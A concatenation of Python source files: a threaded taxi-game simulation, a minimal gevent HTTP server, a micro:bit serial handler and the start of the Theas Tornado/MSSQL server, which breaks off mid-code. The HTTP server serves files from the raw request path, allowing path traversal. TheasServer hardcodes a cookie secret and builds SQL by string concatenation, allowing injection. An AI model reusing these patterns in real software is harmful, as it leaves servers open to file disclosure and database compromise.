matriz[x][y].lock_mutex()
# Obtiene las coordenadas de uno de los clientes adyacentes, (-1, -1) si no hay
adj_client = is_adjacent_client(pos_coord)
# Si hay algun cliente en las adyacentes, toma la posicion de este para moverse a su celda
if adj_client != (-1, -1):
new_x = adj_client[0]
new_y = adj_client[1]
# Si no, se dirige a una al azar de las disponibles
else:
new = random.choice(pos_coord)
new_x = new[0]
new_y = new[1]
# Sale de la celda
self.remove_taxi()
# Guarda la posicion de la celda a la que se va a mover
self.origen = (new_x, new_y)
# Se mete en la celda
self.add_taxi()
# Si hay un cliente en la celda, lo recoge
if self.hay_cliente():
self.coger_cliente()
else:
if verbose_mode == 1:
self.mostrar_estado()
# Libera los mutex
for (x, y) in pos_coord:
matriz[x][y].release_mutex()
# Mientras esta ocupado
while self.busy == 1 and game_end == 0:
sleep(0.1)
# Mientras no haya llegado al origen
while self.origen[0] != self.destino[0] or self.origen[1] != self.destino[1] and game_end == 0:
# Obtiene las posiciones de las celdas adyacentes disponibles
next_coord = self.get_pos_coord()
# Bloquea el mutex de dichas celdas adyacentes
for (x, y) in next_coord:
matriz[x][y].lock_mutex()
# Ordenamos las coordenadas por cercania al destino
next_move = sorted(next_coord, key=self.euclidean_distance)[0]
# Sale de la celda
self.remove_taxi()
# Guarda la posicion de la celda a la que se va a mover
self.origen = (next_move[0], next_move[1])
# Se mete en la celda
self.add_taxi()
if verbose_mode == 1:
self.mostrar_estado_trayecto()
# Libera los mutex
for (x, y) in next_coord:
matriz[x][y].release_mutex()
# Si llega al destino
if self.origen[0] == self.destino[0] and self.origen[1] == self.destino[1]:
# Vuelve a estar libre
self.busy = 0
# Se suma un cliente al contador
self.num_clientes += 1
lock.acquire()
# Muestra por pantalla que ha dejado al taxi y el numero de carreras que lleva realizadas
out = "Soy " + str(self.id) + " y dejo a " + str(self.cliente.id) + " en (" + str(self.origen[0]) \
+ ", " + str(self.origen[1]) + "), he realizado "
if self.num_clientes != 1:
out += str(self.num_clientes) + " carreras. "
else:
out += " 1 carrera."
# No lleva ningun cliente
self.cliente = None
print(out)
# Si ha conseguido 10 clientes
if self.num_clientes == 10:
# Informa de que ha ganado
print("SE ACABÓ EL JUEGO. EL GANADOR ES {0}. ".format(str(self.id)))
# Se acaba el juego
game_end = 1
# Si ha dejado a un cliente pero aún no ha ganado, crea uno nuevo
else:
crear_cliente()
lock.release()
def euclidean_distance(self, celda):
"""Devuelve la distancia euclidea entre el destino y la celda pasada como argumento."""
return sqrt((self.destino[0] - celda[0]) ** 2 + (self.destino[1] - celda[1]) ** 2)
def hay_cliente(self):
"""Devuelve 1 si hay un cliente en la celda del taxi, 0 en caso contrario."""
return 1 if len(matriz[self.origen[0]][self.origen[1]].clientes) > 0 else 0
def saludar(self):
"""Imprime por pantalla su identificador y su posicion."""
print("Soy " + str(self.id) + " y estoy en (" + str(self.origen[0]) + ", " + str(self.origen[1]) + "). ")
def add_taxi(self):
"""Se mete en su nueva celda."""
matriz[self.origen[0]][self.origen[1]].add_taxi(self)
def remove_taxi(self):
"""Sale de su celda."""
matriz[self.origen[0]][self.origen[1]].remove_taxi()
def remove_cliente(self):
"""Saca un cliente de su celda."""
return matriz[self.origen[0]][self.origen[1]].pop_cliente()
def get_pos_coord(self):
"""Devuelve las celdas adyacentes a las que sea posible moverse."""
# Obtiene todas las celdas adyacentes
celdas_ady = get_celdas_ady(self.origen[0], self.origen[1])
ret = []
# Guarda en la lista aquellas que no tienen un taxi y la celda actual
for (x, y) in celdas_ady:
if matriz[x][y].taxi is None or matriz[x][y].taxi == self:
ret.append((x, y))
return ret
def coger_cliente(self):
"""Recoge a un cliente de su celda, sacando a este de su celda y marcandolo como no vivo. El taxi pasa a estar
ocupado y toma como destino el destino del cliente. Imprime por pantalla que ha recogido al cliente."""
# Esta ocupado
self.busy = 1
# Saca al cliente de la celda
cl = self.remove_cliente()
# El cliente ha sido recogido
cl.taken = 1
# El cliente deja de estar vivo
cl.vivo = 0
# Guarda al cliente
self.cliente = cl
# Adquiere el destino del cliente
self.destino = (cl.destino[0], cl.destino[1])
# Informa por pantalla
print("Soy {0} y cogí a {5} en ({1}, {2}), le llevo a ({3}, {4})".format(str(self.id), str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1]), str(cl.id)))
def mostrar_estado_trayecto(self):
"""Imprime por pantalla la posicion del taxi y su destino."""
print("Soy {0} y estoy en ({1}, {2}), llevo a {5} a ({3}, {4})"
.format(str(self.id), str(self.origen[0]), str(self.origen[1]), str(self.destino[0]),
str(self.destino[1]), str(self.cliente.id)))
def mostrar_estado(self):
"""Imprime por pantalla la posicion del taxi."""
print("Soy {0} y estoy en ({1}, {2}).".format(str(self.id), str(self.origen[0]), str(self.origen[1])))
def is_adjacent_client(pos_coord):
"""Devuelve las coordenadas de un cliente, si es que hay uno en las coordenadas adyacentes, o (-1, -1) en caso
contrario."""
for (x, y) in pos_coord:
if len(matriz[x][y].clientes) > 0:
return x, y
return -1, -1
def random_move(moves):
"""Devuelve una celda aleatoria de las pasadas como parametro."""
return moves[random.randint(0, len(moves) - 1)]
def crear_cliente():
"""Crea un nuevo cliente."""
# Incrementa el numero de cliente para crear el identificador
global num_clientes
num_clientes += 1
id_ = "Cliente " + str(num_clientes - 1)
Thread(target=constructor_cliente, args=(id_,)).start()
def hay_taxi(coord):
"""Devuelve 1 si hay un taxi en la posicion dada, 0 en caso contrario."""
return 1 if matriz[coord[0]][coord[1]].taxi is not None else 0
def get_adj_coord(coord):
"""Devuelve las posiciones adyacentes en el eje dado."""
# Si no esta en los bordes
if coord != 0 and coord != len(matriz) - 1:
# Tiene 3 posibles movimientos
return [coord - 1, coord, coord + 1]
# Si esta a la izquierda
elif coord == 0:
# Tiene 2 posibles movimientos
return [coord, coord + 1]
# Si esta a la derecha
else:
# Tiene 2 posibles movimientos
return [coord - 1, coord]
def get_celdas_ady(x, y):
"""Devuelve una lista de tuplas con las celdas adyacentes a las coordenadas dadas."""
return [(a, b) for a in get_adj_coord(x) for b in get_adj_coord(y)]
def random_position():
"""Devuelve una tupla con una posicion aleatoria del entorno."""
return random.randint(0, len(matriz) - 1), random.randint(0, len(matriz) - 1)
def constructor_cliente(id_):
"""Crea un cliente con el id pasado por parametro y le da vida"""
c_ = Cliente(id_)
c_.vive()
def constructor_taxi(id_):
"""Crea un taxi con el id pasado por parametro y lo pone a trabajar"""
t_ = Taxi(id_)
t_.empieza_servicio()
if __name__ == '__main__':
# Crea el mutex
lock = Lock()
# Dimensión de la matriz
m = 50
# Inicializa la matriz
matriz = [[Celda() for x in range(m)] for y in range(m)]
# Variable que controla el fin del juego
game_end = 0
# Lista que contiene los taxis
lista_taxis = []
# Lista que contiene los clientes
lista_clientes = []
# Modo verbose, que permite ver por pantalla cualquier cosa que suceda en el entorno
verbose_mode = 0
# Se activa si ejecutamos el programa con un argumento especifico
if len(argv) > 1:
if argv[1] == "--verbose" or argv[1] == "-v":
verbose_mode = 1
elif argv[1] == "--simple" or argv[1] == "-s":
verbose_mode = 2
print("\n###### EL JUEGO DEL TAXISTA ######\n")
# Pide el número de taxis por pantalla
num_taxis = input('¿Cuántos taxis quieres que haya? \n')
# Mientras no se introduzca un dígito
while not num_taxis.isdigit():
# se informa del error
print("El caracter introducido no es un número entero positivo, vuelve a intentarlo. ")
# y se vuelve a pedir
num_taxis = input('¿Cuántos taxis quieres que haya? \n')
num_taxis = int(num_taxis)
# Pide el numero de clientes por pantalla
num_clientes = input('¿Cuántos clientes quieres que haya? \n')
while not num_clientes.isdigit():
print("El caracter introducido no es un número entero positivo, vuelve a intentarlo. ")
num_clientes = input('¿Cuántos clientes quieres que haya? \n')
num_clientes = int(num_clientes)
print()
# Crea los procesos Cliente
for c in range(num_clientes):
id_c = "Cliente " + str(c)
# Crea el hilo con el cliente
lista_clientes.append(Thread(target=constructor_cliente, args=(id_c,)))
# Crea los procesos Taxi
for t in range(num_taxis):
id_t = "Taxi " + str(t)
# Crea el hilo con el taxi
lista_taxis.append(Thread(target=constructor_taxi, args=(id_t,)))
for clien in lista_clientes:
# Declaramos los hilos como daemon
clien.daemon = True
# y les damos vida
clien.start()
for tax in lista_taxis:
# Declaramos los hilos como daemon
tax.daemon = True
# y les damos vida
tax.start()
# El programa sigue vivo mientras no se cambie el valor de la variable
while game_end == 0:
pass
|
basic02.py
|
"""
web服务器返回灵活页面,根据制定的路径打开指定的页面
"""
import socket, threading, multiprocessing,gevent
from gevent import monkey
monkey.patch_all()
class HTTPServer(object):
def __init__(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket优化,一个服务器的端口释放后会等待两分钟之后才能再被使用,SO_REUSEADDR是让端口释放后立即就可以被再次使用。
# 参数1:设置socket所在的层级,SOL_SOCKET: 基本套接口
# 参数2:设置socket的设置选项,地址重用选项
# 参数3:设置还是取消,1/0
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定
server_socket.bind(('', 9999))
# 监听,设置已完成三次握手队列的长度
server_socket.listen(128)
self.server_socket = server_socket
def request_handler(self, client_socket):
""" 为每个客户进行服务"""
# 接收每个客户的请求报文,通过recv_data判断客户端是不是已经断开连接
recv_data = client_socket.recv(4096)
if not recv_data:
print("客户端已经断开连接.")
client_socket.close()
return
# 对请求报文进行切割,获取请求行中的请求路径:a.html
request_str_data = recv_data.decode()
data_list = request_str_data.split("\r\n")
path_info = data_list[0].split(" ")[1]
print(" 用户的请求路径为: %s" % path_info)
if path_info == "/":
path_info = "/a.html"
try:
file = open("./static" + path_info, "rb")
file_data = file.read()
file.close()
except Exception as e:
# 给客户端回复响应报文,、\r\n == 键盘上的Enter
response_line = "HTTP/1.1 404 Not Found\r\n"
# 响应头
response_header = "Server: PythonWebServer2.0\r\n"
# 响应体
response_body = "Error!!!!!!"
# 拼接豹纹
response_data = response_line + response_header + "\r\n" + response_body
# 发送报文,不能以str的方式方式,需要进行encode
client_socket.send(response_data.encode())
else:
# 给客户端回复响应报文,、\r\n == 键盘上的Enter
response_line = "HTTP/1.1 200 OK\r\n"
# 响应头
response_header = "Server: PythonWebServer2.0\r\n"
# 响应体
response_body = file_data
# 拼接豹纹
response_data = (response_line + response_header + "\r\n").encode() + response_body
# 发送报文,不能以str的方式方式,**不再**需要进行encode
client_socket.send(response_data)
# 关闭套接字
client_socket.close()
def start(self):
while True:
# 队列中取出一个客户端套接字进行服务
client_socket, client_addr = self.server_socket.accept()
"""
线程处理每一个客户端的accept,线程你给的变量等是共享的
所以传入的client_socket和主线程的client_socket是同一个东西,关一个即可
"""
# thread = threading.Thread(target=request_handler, args=(client_socket,))
# thread.start()
"""
线程处理每一个客户端的accept
在进程copy一份client_socket之后,关闭主进程的client_socket
由于主进程和子进程互相独立,copy关系,两个都关闭网页左上角才不会一直转
"""
# proc = multiprocessing.Process(target=self.request_handler, args=(client_socket,))
# proc.start()
# client_socket.close()
"""
gevent协程的方式, join/joinAll就是保证主线程存活的作用,因为此处在while true死循环中,所以不需要join
"""
gevent.spawn(self.request_handler, client_socket)
def testWeb():
http_server = HTTPServer()
http_server.start()
def main():
testWeb()
if __name__ == '__main__':
main()
|
mbhandler.py
|
import serial
import serial.tools.list_ports
import threading
import warnings
import queue as q
class NoMicrobitError(Exception):
def __init__(self, message):
# Call the base class constructor with the parameters it needs
super(Exception, self).__init__(message)
BAUD = 115200
RUNNING = True
DEBUG = False
# Taken (and adapted) from https://github.com/ntoll/microrepl/blob/master/microrepl.py
def get_port():
ports = list(serial.tools.list_ports.comports())
for port, desc, opts in ports:
if 'VID:PID=' in opts:
s = opts.find('VID:PID=') + 8
e = opts.find(' ',s)
vid, pid = opts[s:e].split(':')
vid, pid = int(vid, 16), int(pid, 16)
if vid == 0x0D28 and pid == 0x0204:
return port
raise NoMicrobitError("No microbits found")
return None
def __default_worker():
port = get_port()
s = serial.Serial(port)
s.baudrate = BAUD
s.parity = serial.PARITY_NONE
s.databits = serial.EIGHTBITS
s.stopbits = serial.STOPBITS_ONE
state = {'a': False, 'b': False}
while True:
if not RUNNING:
break
try:
data = s.readline().decode("ascii").rstrip()
except:
continue
if data == 'None':
continue
try:
v = int(data.split(':')[0],16)
except:
continue
b = (v & 1 == 1)
v >>= 1
a = (v & 1 == 1)
v >>= 1
z = v & 255
v >>= 8
y = v & 255
v >>= 8
x = v & 255
if x > 127:
x -= 256
if y > 127:
y -= 256
if z > 127:
z -= 256
x *= -1
y *= -1
name = data.split(':')[1]
e = {
'name': name,
'accelerometer': {
'x': x,
'y': y,
'z': z,
},
'button_a': {
'pressed': a,
'down': a and not state['a'],
'up': not a and state['a']
},
'button_b': {
'pressed': b,
'down': b and not state['b'],
'up': not b and state['b']
}
}
state['a'] = a
state['b'] = b
if DEBUG:
print(e)
post(e)
s.close()
def __raw_worker():
port = get_port()
s = serial.Serial(port)
s.baudrate = BAUD
s.parity = serial.PARITY_NONE
s.databits = serial.EIGHTBITS
s.stopbits = serial.STOPBITS_ONE
while True:
if not RUNNING:
break
try:
data = s.readline().decode("ascii").rstrip()
except:
continue
if data == 'None':
continue
if DEBUG:
print(data)
post(data)
s.close()
def __pygame_init():
global pygame
import pygame
global post
global MICROBITEVENT
MICROBITEVENT = pygame.USEREVENT
pygame.USEREVENT += 1
post = __pygame_post
def __pygame_post(e):
if isinstance(e,str):
e = {'message': e}
ev = pygame.event.Event(MICROBITEVENT,**e)
try:
pygame.event.post(ev)
except: # what's the error here if the queue is full/non-existent?
pass
def __queue_init():
global post
global queue
queue = q.Queue()
post = __queue_post
def __queue_post(e):
try:
queue.put(e)
except q.Full:
pass
def init(**kwargs):
global worker
global DEBUG
method = "queue"
output = "default"
worker = __default_worker
if 'method' in kwargs:
method = kwargs['method']
if 'output' in kwargs:
output = kwargs['output']
if 'debug' in kwargs:
DEBUG = True
if output == "raw":
worker = __raw_worker
if method == "pygame":
__pygame_init()
else:
__queue_init()
t = threading.Thread(target=worker)
t.daemon = True
t.start()
def quit():
global RUNNING
RUNNING = False
# Should we clean up after ourselves?
|
TheasServer.py
|
#!usr/bin/python
import sys
import os
import platform
import datetime
import threading
import time
import signal
import uuid
import binascii
import traceback
import string
import json
import tornado.web
import tornado.websocket
import tornado.ioloop
import tornado.options
import tornado.httpserver
from multiprocessing import Lock
from concurrent.futures import ThreadPoolExecutor
from tornado.concurrent import run_on_executor
import theas
import _mssql
import logging
import TheasCustom
import urllib.parse as urlparse
if platform.system() == 'Windows':
from TheasServerSvc import write_winlog
else:
def write_winlog(*args):
if len(args) >= 2:
print(args[1])
else:
print(args[0])
# import asyncio
# import msvcrt
# import mimetypes
# import os
# import time
# import gc
# from pympler import muppy, summary
# from jinja2 import Template, Untornado.options.defined
# from jinja2.environment import Environment
# from tornado.stack_context import ExceptionStackContext
# import contextlib
# import decimal
# import pymssql
# from tornado import gen, concurrent, ioloop
# from multiprocessing import Process, Lock
# from tornado.options import tornado.options.define, options
# import tornado.options
__author__ = 'DavidRueter'
"""
Theas web application server.
Author: David Rueter ([email protected])
Date: 5/9/2016
Description : Wrapper to run TheasServer web server as a Windows service.
Home: https://github.com/davidrueter/Theas
Usage : TheasServerSvc.exe
See settings.cfg for additional options. Options may be set in the config file, or may be passed in
on the command line.
It is recommended that you rename the TheasServerSvc.exe to something specific to your application.
May be run as a Windows service. See TheasServerSvc.py and setup.py for more information.
"""
# @contextlib.contextmanager
# def catch_async_exceptions(type, value, traceback):
# try:
# print('ERROR: ' + str(value.args[0][1]))
# #yield
# except Exception:
# print('ERROR: ' + str(value.args[0][1]))
THEAS_VERSION = '0.90.1.50' # from version.cfg
SESSION_MAX_IDLE = 60 # Max idle time (in minutes) before TheasServer session is terminated
REMOVE_EXPIRED_THREAD_SLEEP = 60 # Seconds to sleep in between polls in background thread to check for expired sessions, 0 to disable
LOGGING_LEVEL = 1 # Enable all logging. 0 to disable all, other value to specify threshold.
LOGIN_RESOURCE_CODE = 'login'
LOGIN_AUTO_USER_TOKEN = None
DEFAULT_RESOURCE_CODE = None
FULL_SQL_IS_OK_CHECK = False
USE_WORKER_THREADS = False
MAX_WORKERS = 30
USE_SESSION_COOKIE = True
REMEMBER_USER_TOKEN = False
FORCE_REDIR_AFTER_POST = True
USE_SECURE_COOKIES = True
SESSION_HEADER_NAME = 'X-Theas-Sesstoken'
SESSION_COOKIE_NAME = 'theas:th:ST'
USER_COOKIE_NAME = 'theas:th:UserToken'
COOKIE_SECRET = 'tF7nGhE6nIcPMTvGPHlbAk5NIoCOrKnlHIfPQyej6Ay='
# NOTE:
# 1) This is the maximum number of threads per thread pool, not for the whole application. In practice each
# class that uses background threads via the @run_on_executor decorator has its own thread pool. Thus the
# total number of threads in the application will be {number of classes} x MAX_WORKERS (plus any other threads
# used by the application).
# 2) Counter-intuitively, idle threads are not reused until MAX_WORKERS threads have been created. For example,
# suppose MAX_WORKERS = 30. When the application is started and the first request comes in, a new thread
# would be created. The request is completed, the thread is idle. Then a second request comes in. A thread
# would still be created (now two thread), and so on, until all 30 threads in the pool were created. See
# Tornado's module thread.py, class ThreadPoolExecutor._adjust_thread_count, and in particular, this comment:
# # TODO(bquinlan): Should avoid creating new threads if there are more
# # idle threads than items in the work queue.
G_sessions = None # Global list of sessions
G_cached_resources = None # Global list of cached resources
G_program_options = None
G_server_is_running = False
G_break_handler = None
def format_error(e):
err_msg = ''
err_msg_dblib = ''
err_msg_friendly = ''
err_msg_template = ''
if isinstance(e, str):
err_msg = e
else:
err_msg = e.text.decode('ascii')
p = err_msg.find('DB-Lib error')
if p >= 0:
# The error message from pymmsql (annoyingly) appends:
# DB-Lib error message 20018, severity 16: General SQL Server error: Check messages from the SQL Server
# Strip that out.
err_msg_dblib = err_msg[p:]
err_msg = err_msg[:p]
# By convention, if err_msg contains a pipe character | we take the first part of this message
# to be the "technical" message, and the second part to be the "friendly" message, suitable for
# display to an end user.
# Additionally, a second pipe character | may be present, marking the end of the "friendly"message,
# after which is a flag 1 or 0 to indicate whether the "technical" message should be displayed.
err_msgs = err_msg.split('|')
err_msg_tech = ''
err_msg_friendly = ''
err_msg_showtech = '1'
err_msg_title = ''
if len(err_msgs) == 1:
err_msg_tech = err_msg
err_msg_showtech = '1'
else:
err_msg_tech = err_msgs[0]
err_msg_friendly = err_msgs[1]
if len(err_msgs) > 2:
err_msg_showtech = '1' if err_msgs[2] == '1' else '0'
if len(err_msgs) > 3:
err_msg_title = err_msgs[3]
err_msg = ''
err_msg_storedproc = None
if hasattr(e, 'procname'):
err_msg_storedproc = e.procname.decode('ascii')
err_msg_tech += \
('Exception type ' + type(e).__name__ + '\n') if type(e).__name__ != 'str' else '' + \
'Stored procedure ' + err_msg_storedproc if err_msg_storedproc is not None else '' + \
(' error ' + e.number) if hasattr(e, 'number') else '' + \
(' at line ' + e.line) if hasattr(e, 'line') else ''
include_dblib_error = False
if include_dblib_error:
err_msg_tech = err_msg_tech + '\n' + err_msg_dblib
err_msg = '{}|{}|{}|{}'.format(err_msg_tech, err_msg_friendly, err_msg_showtech, err_msg_title)
return err_msg
class BreakHandler:
"""
Trap CTRL-C, set a flag, and keep going. This is very useful for
gracefully exiting database loops while simulating transactions.
To use this, make an instance and then enable it. You can check
whether a break was trapped using the trapped property.
# Create and enable a break handler.
ih = BreakHandler()
ih.enable()
for x in big_set:
complex_operation_1()
complex_operation_2()
complex_operation_3()
# Check whether there was a break.
if ih.trapped:
# Stop the loop.
break
ih.disable()
# Back to usual operation...
from: http://stacyprowell.com/blog/2009/03/trapping-ctrlc-in-python/
Also, consider:
# see: https://docs.microsoft.com/en-us/windows/console/registering-a-control-handler-function
import win32api
def ctrlHandler(ctrlType):
return True
win32api.SetConsoleCtrlHandler(ctrlHandler, True)
"""
def __init__(self, emphatic=9):
"""
Create a new break handler.
@param emphatic: This is the number of times that the user must
press break to *disable* the handler. If you press
break this number of times, the handler is automagically
disabled, and one more break will trigger an old
style keyboard interrupt. The default is nine. This
is a Good Idea, since if you happen to lose your
connection to the handler you can *still* disable it.
"""
self._count = 0
self._enabled = False
self._emphatic = emphatic
self._oldhandler = None
return
def _reset(self):
"""
Reset the trapped status and count. You should not need to use this
directly; instead you can disable the handler and then re-enable it.
This is better, in case someone presses CTRL-C during this operation.
"""
self._count = 0
return
def enable(self):
"""
Enable trapping of the break. This action also resets the
handler count and trapped properties.
"""
if not self._enabled:
self._reset()
self._enabled = True
self._oldhandler = signal.signal(signal.SIGINT, self)
return
def disable(self):
"""
Disable trapping the break. You can check whether a break
was trapped using the count and trapped properties.
"""
if self._enabled:
self._enabled = False
signal.signal(signal.SIGINT, self._oldhandler)
self._oldhandler = None
return
def __call__(self, signame, sf):
"""
An break just occurred. Save information about it and keep
going.
"""
self._count += 1
print('Ctrl-C Pressed (caught by BreakHandler)')
# If we've exceeded the "emphatic" count disable this handler.
if self._count >= self._emphatic:
self.disable()
return
def __del__(self):
"""
Python is reclaiming this object, so make sure we are disabled.
"""
self.disable()
return
@property
def count(self):
"""
The number of breaks trapped.
"""
return self._count
@property
def trapped(self):
"""
Whether a break was trapped.
"""
return self._count > 0
class TheasServerError(BaseException):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class TheasServerSQLError(TheasServerError):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def StopServer():
global G_server_is_running
G_server_is_running = False
msg = 'StopServer() called'
ThSession.cls_log('Shutdown', msg)
write_winlog(msg)
# this_ioloop = tornado.ioloop.IOLoop.current()
# this_ioloop.add_callback(this_ioloop.stop)
# def set_exit_handler(func):
# signal.signal(signal.SIGTERM, func)
# def on_exit(signum, frame):
# ThSession.cls_log('Shutdown', 'on_exit() called')
# StopServer()
def do_periodic_callback():
global G_server_is_running
global G_break_handler
# Called by Tornado once a second.
# ThSession.cls_log('Periodic', 'do_periodic_callback() called')
if G_break_handler and G_break_handler.trapped:
# Ctrl-C pressed
G_server_is_running = False
# if msvcrt.kbhit():
# # Any key pressed
# G_server_is_running = False
if not G_server_is_running:
ThSession.cls_log('Periodic', 'Trying to stop IOLoop.instance()')
this_ioloop = tornado.ioloop.IOLoop.current()
this_ioloop.add_callback(this_ioloop.stop)
# tornado.ioloop.IOLoop.current().stop()
# tornado.ioloop.IOLoop.instance().stop()
# tornado.ioloop.IOLoop.instance().add_callback(tornado.ioloop.IOLoop.instance().stop)
class ThStoredProc:
"""#Class ThStoredProc is a helper class that wraps _mssql.MSSQLStoredProcedure.
This allows us to conveniently use the session's SQL connection and to perform session-focused logging.
ThStoredProc also provides parameter sniffing, to simplify working with arbitrary stored procedures
without hard-coding parameter names.
In the future we may want to consider moving theas parameter passing (to the stored procedure) and
updating (for parameters returned by the stored procedure) to ThsStoredProc. (At this point theas
parameters are managed exclusively in ThSession.)
"""
@property
def is_ok(self):
if not FULL_SQL_IS_OK_CHECK:
return True
else:
self.th_session.log('StoredProc', 'Checking is_ok:', self.stored_proc_name)
result = self._storedproc is not None and self.connection is not None and self.connection.connected
if result and FULL_SQL_IS_OK_CHECK:
try:
self.connection.execute_non_query('SELECT 1 AS IsOK')
except:
result = False
if not result:
self.th_session.logged_in = False
self.th_session.sql_conn = None
return result
def __init__(self, this_stored_proc_name, this_th_session):
self._connection = None
self._storedproc = None
self.th_session = None
self.stored_proc_name = None
self.parameter_list = {} # sniffed parameters. See parameters for bound parameters.
self.resultset = []
self.stored_proc_name = this_stored_proc_name
# Use provided session.
self.th_session = this_th_session
self._connection = this_th_session.sql_conn
self.th_session.log('StoredProc', 'Initializing ThStoredProc:', self.stored_proc_name)
if self.th_session.sql_conn is None or not self.th_session.sql_conn.connected:
self.th_session.log('StoredProc', 'New connection', self.stored_proc_name)
self.th_session.init_session()
if self.th_session.sql_conn is not None and self.th_session.sql_conn.connected and self.stored_proc_name:
self.th_session.log('StoredProc', 'Existing connection:', self.stored_proc_name)
self._storedproc = self.th_session.sql_conn.init_procedure(self.stored_proc_name)
else:
self._storedproc = None
def __del__(self):
self._storedproc = None
del self._storedproc
self.th_session = None
del self.th_session
def refresh_parameter_list(self):
self.th_session.log('StoredProc', 'Refreshing parameter list:', self.stored_proc_name)
if self.parameter_list is not None:
self.parameter_list = {}
if self.stored_proc_name is not None and self.th_session is not None and self.th_session.sql_conn is not None and self.th_session.sql_conn.connected:
try:
self.th_session.sql_conn.execute_query(
'EXEC theas.sputilGetParamNames @ObjectName = \'{}\''.format(self.stored_proc_name))
resultset = [row for row in self.th_session.sql_conn]
for row in resultset:
this_param_info = {}
this_param_info['is_output'] = row['is_output']
self.parameter_list[row['ParameterName']] = this_param_info
# self.parameter_list.append(row['ParameterName'])
except Exception as e:
self.th_session.log('Sessions', '***Error accessing SQL connection', e)
self.th_session.sql_conn = None
self.parameter_list = None
# self.th_session.init_session(force_init=True)
# self._storedproc = self.th_session.sql_conn.init_procedure(self.stored_proc_name)
# self.th_session.authenticate(username=None, password=None) #ToDo: need to think about this. Can we safely re-authenticate?
# self.th_session.log('Sessions', '***Cannot automatically log in after failed SQL connection', e.message)
raise
def execute(self, fetch_rows=True):
self.th_session.comments = 'ThStoredProc.execute'
self.th_session.log('StoredProc', 'Executing:', self.stored_proc_name)
_mssql.min_error_severity = 1
this_result = False
if self.is_ok:
self.th_session.do_on_sql_start(self)
try:
# pymssql and/or FreeTDS have a number of limitations.
# a) They do not seem to support output parameters
# b) They truncate input parameters at 8000 characters
# To work around b), we must not use _storedproc.execute, and must instead build our own
# SQL query to execute.
# this_result = self._storedproc.execute(*args, **kwargs)
this_sql = 'EXEC ' + self.stored_proc_name
for this_name, this_value in self.parameters.items():
if isinstance(this_name, str) and this_name.startswith('@'):
this_sql += ' ' + this_name + '='
this_sql += 'NULL' if this_value is None else '\'' + str(this_value) + '\''
this_sql += ', '
if this_sql.endswith(', '):
this_sql = this_sql[:-2]
self.th_session.sql_conn.execute_query(this_sql)
if fetch_rows:
self.resultset = [row for row in self.th_session.sql_conn]
self.th_session.do_on_sql_done(self)
this_result = True
except Exception as e:
if LOGGING_LEVEL:
print(e)
raise e
self.th_session.comments = None
return this_result
# def bind(self, *args, **kwargs):
def bind(self, value, dbtype, param_name=None, output=False, null=False, max_length=-1):
# def bind(self, object value, int dbtype, str param_name=None, int output=False, int null=False, int max_length=-1):
this_result = None
if self._storedproc is not None:
if value is None:
null = True
elif dbtype in (_mssql.SQLCHAR, _mssql.SQLVARCHAR, _mssql.SQLUUID):
value = str(value)
this_result = self._storedproc.bind(value, dbtype, param_name=param_name, output=output, null=null,
max_length=max_length)
return this_result
@property
def connection(self):
return self._storedproc.connection
@property
def name(self):
return self._storedproc.name
@property
def parameters(self):
return self._storedproc.parameters
# -------------------------------------------------
# Global cached resources
# -------------------------------------------------
class ThResource:
"""Class ThResource is to store a single web resource.
A web resource may be an HTML template, an HTML fragment (i.e. a static block), an HTML page, or anything else
to be sent to the browser: .css, .js., .jpg, .img, etc.
A resource may also have flags to help control access and behavior, such as is_public that indicates whether
this resource can be directly served to a browser (versus being for use by the TheasServer only),
render_jinja_template to indicate whether this resource needs to be rendered before sending, etc.
Works with ThCachedResources.
"""
def __init__(self):
self.resource_code = ''
self.filename = ''
self.filetype = ''
self.date_updated = ''
self.data = ''
self.api_stored_proc = None
self.api_async_stored_proc = None
self.api_stored_proc_resultset_str = None
self.is_public = False
self.is_static = False
self.requires_authentication = False
self.render_jinja_template = False
self.skip_xsrf = False
self.exists = True
self.on_before = None
self.on_after = None
self.revision = None
def __del__(self):
self.data = None
class ThCachedResources:
"""Class ThCachedResources is to manage a thread-safe global dictionary for storage of cached web resources
(see ThResource).
It provides a mutex, and methods for locking and unlocking the global dictionary, as well as methods for
loading resources, retrieving resources, and deleting resources (i.e. purging cached resources).
"""
_mutex = Lock()
def lock(self):
self._mutex.acquire()
def unlock(self):
self._mutex.release()
def __init__(self):
self.__resources = {}
self.__static_blocks_dict = {}
self.__resource_versions_dict = {}
self.default_path = G_program_options.settings_path
def __del__(self):
self.lock()
try:
for resource_code in self.__resources:
self.__resources[resource_code] = None
self.__resources = None
del self.__resources
for resource_code in self.__static_blocks_dict:
self.__resources[resource_code] = None
self.__static_blocks_dict = None
del self.__static_blocks_dict
self.__resource_versions_dict = None
del self.__resource_versions_dict
finally:
self.unlock()
@property
def static_blocks_dict(self):
return self.__static_blocks_dict
@static_blocks_dict.setter
def static_blocks_dict(self, new_dict):
self.__static_blocks_dict = new_dict
@property
def resource_versions_dict(self):
return self.__resource_versions_dict
@resource_versions_dict.setter
def resource_versions_dict(self, new_dict):
self.__resource_versions_dict = new_dict
def len(self):
return len(self.__resources)
def add_resource(self, resource_code, resource_dict):
self.lock()
try:
self.__resources[resource_code] = resource_dict
finally:
self.unlock()
def load_resource(self, resource_code, th_session, all_static_blocks=False, sessionless=False, from_filename=None,
is_public=False, is_static=False, get_default_resource=False):
this_resource = None
if from_filename:
# load resource from file
if from_filename.endswith('Theas.js'):
try:
with open(from_filename, 'r') as f:
buf = f.read()
f.close()
except Exception:
raise TheasServerError('Error while starting the Theas Server: File Theas.js could not be read.')
this_resource = ThResource()
this_resource.resource_code = resource_code
this_resource.filename = from_filename
this_resource.filename = 'application/javascript'
this_resource.data = buf
this_resource.api_stored_proc = None
this_resource.api_async_stored_proc = None
this_resource.api_stored_proc_resultset_str = None
this_resource.is_public = is_public
this_resource.is_static = is_static
this_resource.requires_authentication = False
self.add_resource(resource_code, this_resource)
else:
raise TheasServerError(
'Error due to request of file {} from the file system. Server is configured to server resources only from the database.'.format(
from_filename))
else:
# load resource from database
if th_session is None:
if not sessionless:
assert th_session is not None, 'ThCachedResources: load_resource called without a valid session'
else:
th_session = ThSession(None, sessionless=True)
resource_code = None
if all_static_blocks:
th_session.log('Resource', 'Will load all static resources from the database.')
else:
if resource_code is None or\
